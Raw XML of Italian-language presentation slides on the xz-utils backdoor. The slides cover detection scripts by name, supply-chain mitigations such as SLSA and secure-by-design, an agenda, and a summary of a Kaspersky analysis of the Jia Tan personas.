            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>populate_m4_db.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find_m4.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confronto dell'output di decompressione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package_decompcheck_all.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compara decompressione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con l'output di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137185614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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="39703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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> della supply chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backseat-signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: autentica la catena di custodia delle distribuzioni Linux ai loro codici sorgente, attraverso link crittografici.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SLSA (Supply-Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> For Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Artifacts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>): framework di sicurezza open-source, fondato nel 2021 in risposta a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per fortificare il Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Life </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cycle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, prevenire il tampering e garantire integrità.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151385935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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="31085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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure-by-design</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un approccio alla progettazione che fa della sicurezza la base.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A seguito del crescente numero di cyber attacchi alle supply chain, istituzioni come la CISA (l'agenzia per la cybersicurezza americana) stanno portando avanti campagne di sensibilizzazione ed esercitazioni volte a potenziare le capacità di risposta e coordinamento di sviluppatori e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800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4580645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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3788714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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Cosa sappiamo oggi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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="46474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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Singaporean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> guy, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> guy, and a German guy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a bar…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secondo un analisi di Kaspersky, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>benchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan, Dennis Ens, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar siano in teoria persone diverse, seguono tutte e tre lo stesso schema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un account GitHub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tre mail ciascuno, con tre nickname piuttosto simili ("jiat75", "jiatan018", "JiaT75")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>un account IRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un account Ubuntu One</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono sulla mailing list di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono sui downstream (ad es. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scrivono codice simile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compiono gli stessi errori grammaticali</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138646534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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Cosa sappiamo oggi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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
